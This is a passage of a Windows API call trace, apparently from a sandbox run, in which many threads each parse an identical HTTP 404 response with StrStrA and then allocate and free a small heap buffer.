charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0156.665] GetProcessHeap () returned 0x6a0000 [0156.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0156.666] GetProcessHeap () returned 0x6a0000 [0156.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0156.666] GetProcessHeap () returned 0x6a0000 [0156.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 16 os_tid = 0xfc8 [0156.891] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0156.892] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:03 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0156.892] GetProcessHeap () returned 0x6a0000 [0156.892] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0156.892] GetProcessHeap () returned 0x6a0000 [0156.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0156.892] GetProcessHeap () returned 0x6a0000 [0156.892] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 17 os_tid = 0xec8 [0157.147] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.147] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0157.147] GetProcessHeap () returned 0x6a0000 [0157.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0157.147] GetProcessHeap () returned 0x6a0000 [0157.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0157.148] GetProcessHeap () returned 0x6a0000 [0157.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 18 os_tid = 0x424 [0157.346] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.346] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0157.346] GetProcessHeap () returned 0x6a0000 [0157.346] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0157.346] GetProcessHeap () returned 0x6a0000 [0157.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0157.347] GetProcessHeap () returned 0x6a0000 [0157.347] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 19 os_tid = 0x8b4 [0157.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0157.704] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:04 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0157.704] GetProcessHeap () returned 0x6a0000 [0157.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8e0 [0157.704] GetProcessHeap () returned 0x6a0000 [0157.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8e0 | out: hHeap=0x6a0000) returned 1 [0157.704] GetProcessHeap () returned 0x6a0000 [0157.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b5c98 | out: hHeap=0x6a0000) returned 1 Thread: id = 20 os_tid = 0xbf0 Thread: id = 21 os_tid = 0x13ac Thread: id = 22 os_tid = 0x360 [0158.136] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.136] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0158.136] GetProcessHeap () returned 0x6a0000 [0158.136] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea18 [0158.136] GetProcessHeap () returned 0x6a0000 [0158.136] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea18 | out: hHeap=0x6a0000) returned 1 [0158.136] GetProcessHeap () returned 0x6a0000 [0158.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 23 os_tid = 0x31c [0158.576] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.576] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0158.576] GetProcessHeap () returned 0x6a0000 [0158.576] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0158.576] GetProcessHeap () returned 0x6a0000 [0158.576] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0158.576] GetProcessHeap () returned 0x6a0000 [0158.577] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 24 os_tid = 0x46c [0158.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0158.918] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:05 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0158.918] GetProcessHeap () returned 0x6a0000 [0158.918] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0158.918] GetProcessHeap () returned 0x6a0000 [0158.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0158.918] GetProcessHeap () returned 0x6a0000 [0158.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b9908 | out: hHeap=0x6a0000) returned 1 Thread: id = 25 os_tid = 0xc30 [0159.206] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.206] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0159.206] GetProcessHeap () returned 0x6a0000 [0159.206] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0159.206] GetProcessHeap () returned 0x6a0000 [0159.206] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0159.206] GetProcessHeap () returned 0x6a0000 [0159.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 26 os_tid = 0x534 [0159.414] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.414] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0159.414] GetProcessHeap () returned 0x6a0000 [0159.414] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0159.415] GetProcessHeap () returned 0x6a0000 [0159.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0159.415] GetProcessHeap () returned 0x6a0000 [0159.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 27 os_tid = 0xc0c [0159.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.659] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0159.659] GetProcessHeap () returned 0x6a0000 [0159.659] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0159.659] GetProcessHeap () returned 0x6a0000 [0159.659] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0159.659] GetProcessHeap () returned 0x6a0000 [0159.660] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 28 os_tid = 0xbf8 [0159.970] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0159.970] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:06 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0159.971] GetProcessHeap () returned 0x6a0000 [0159.971] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be850 [0159.971] GetProcessHeap () returned 0x6a0000 [0159.971] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be850 | out: hHeap=0x6a0000) returned 1 [0159.971] GetProcessHeap () returned 0x6a0000 [0159.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 29 os_tid = 0x77c [0160.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.306] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0160.306] GetProcessHeap () returned 0x6a0000 [0160.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8b0 [0160.306] GetProcessHeap () returned 0x6a0000 [0160.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8b0 | out: hHeap=0x6a0000) returned 1 [0160.306] GetProcessHeap () returned 0x6a0000 [0160.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 30 os_tid = 0x1080 [0160.585] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.585] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0160.585] GetProcessHeap () returned 0x6a0000 [0160.585] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be820 [0160.585] GetProcessHeap () returned 0x6a0000 [0160.585] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be820 | out: hHeap=0x6a0000) returned 1 [0160.585] GetProcessHeap () returned 0x6a0000 [0160.586] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 31 os_tid = 0xe60 [0160.755] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0160.756] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0160.756] GetProcessHeap () returned 0x6a0000 [0160.756] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0160.756] GetProcessHeap () returned 0x6a0000 [0160.756] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0160.756] GetProcessHeap () returned 0x6a0000 [0160.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 32 os_tid = 0x1318 [0161.054] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.054] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:07 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0161.054] GetProcessHeap () returned 0x6a0000 [0161.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0161.054] GetProcessHeap () returned 0x6a0000 [0161.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0161.054] GetProcessHeap () returned 0x6a0000 [0161.055] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 33 os_tid = 0x3b8 [0161.320] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.322] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0161.322] GetProcessHeap () returned 0x6a0000 [0161.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0161.323] GetProcessHeap () returned 0x6a0000 [0161.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0161.323] GetProcessHeap () returned 0x6a0000 [0161.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 34 os_tid = 0x1340 [0161.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.660] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0161.660] GetProcessHeap () returned 0x6a0000 [0161.661] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6bea30 [0161.661] GetProcessHeap () returned 0x6a0000 [0161.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bea30 | out: hHeap=0x6a0000) returned 1 [0161.661] GetProcessHeap () returned 0x6a0000 [0161.661] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 35 os_tid = 0x1314 [0161.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0161.899] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:08 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0161.899] GetProcessHeap () returned 0x6a0000 [0161.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0161.900] GetProcessHeap () returned 0x6a0000 [0161.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0161.900] GetProcessHeap () returned 0x6a0000 [0161.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 36 os_tid = 0x12d4 [0162.099] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.100] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0162.100] GetProcessHeap () returned 0x6a0000 [0162.100] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0162.100] GetProcessHeap () returned 0x6a0000 [0162.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0162.100] GetProcessHeap () returned 0x6a0000 [0162.100] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 37 os_tid = 0x1350 [0162.315] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.316] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0162.317] GetProcessHeap () returned 0x6a0000 [0162.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0162.317] GetProcessHeap () returned 0x6a0000 [0162.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0162.317] GetProcessHeap () returned 0x6a0000 [0162.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 38 os_tid = 0xa24 [0162.599] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.599] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0162.599] GetProcessHeap () returned 0x6a0000 [0162.599] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0162.600] GetProcessHeap () returned 0x6a0000 [0162.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0162.600] GetProcessHeap () returned 0x6a0000 [0162.600] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 39 os_tid = 0x30c [0162.870] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0162.870] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:09 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0162.870] GetProcessHeap () returned 0x6a0000 [0162.870] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be940 [0162.871] GetProcessHeap () returned 0x6a0000 [0162.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be940 | out: hHeap=0x6a0000) returned 1 [0162.871] GetProcessHeap () returned 0x6a0000 [0162.871] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 40 os_tid = 0x13ec [0163.060] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.061] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0163.061] GetProcessHeap () returned 0x6a0000 [0163.061] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0163.061] GetProcessHeap () returned 0x6a0000 [0163.061] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0163.061] GetProcessHeap () returned 0x6a0000 [0163.062] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 41 os_tid = 0x1310 [0163.257] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.257] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0163.257] GetProcessHeap () returned 0x6a0000 [0163.257] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be8f8 [0163.257] GetProcessHeap () returned 0x6a0000 [0163.257] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be8f8 | out: hHeap=0x6a0000) returned 1 [0163.258] GetProcessHeap () returned 0x6a0000 [0163.258] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 42 os_tid = 0x1354 [0163.572] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0163.572] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:10 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0163.573] GetProcessHeap () returned 0x6a0000 [0163.573] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be868 [0163.573] GetProcessHeap () returned 0x6a0000 [0163.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be868 | out: hHeap=0x6a0000) returned 1 [0163.573] GetProcessHeap () returned 0x6a0000 [0163.573] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 43 os_tid = 0xa94 [0164.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.227] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0164.227] GetProcessHeap () returned 0x6a0000 [0164.227] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0164.227] GetProcessHeap () returned 0x6a0000 [0164.227] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0164.227] GetProcessHeap () returned 0x6a0000 [0164.228] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 44 os_tid = 0x318 [0164.423] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.424] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0164.424] GetProcessHeap () returned 0x6a0000 [0164.424] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0164.424] GetProcessHeap () returned 0x6a0000 [0164.424] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0164.424] GetProcessHeap () returned 0x6a0000 [0164.425] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 45 os_tid = 0x8b8 [0164.608] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.608] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0164.608] GetProcessHeap () returned 0x6a0000 [0164.608] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0164.608] GetProcessHeap () returned 0x6a0000 [0164.608] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0164.608] GetProcessHeap () returned 0x6a0000 [0164.609] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 46 os_tid = 0xac4 [0164.842] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0164.842] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:11 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0164.842] GetProcessHeap () returned 0x6a0000 [0164.842] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x6be988 [0164.842] GetProcessHeap () returned 0x6a0000 [0164.842] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6be988 | out: hHeap=0x6a0000) returned 1 [0164.845] GetProcessHeap () returned 0x6a0000 [0164.845] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf370 | out: hHeap=0x6a0000) returned 1 Thread: id = 47 os_tid = 0xe20 [0165.231] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0165.231] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Thu, 05 May 2022 07:04:12 GMT\r\nServer: Apache\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nConnection: close\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0165.231] GetProcessHeap () returned 0x6a0000 [0165.231] RtlAllocateHeap 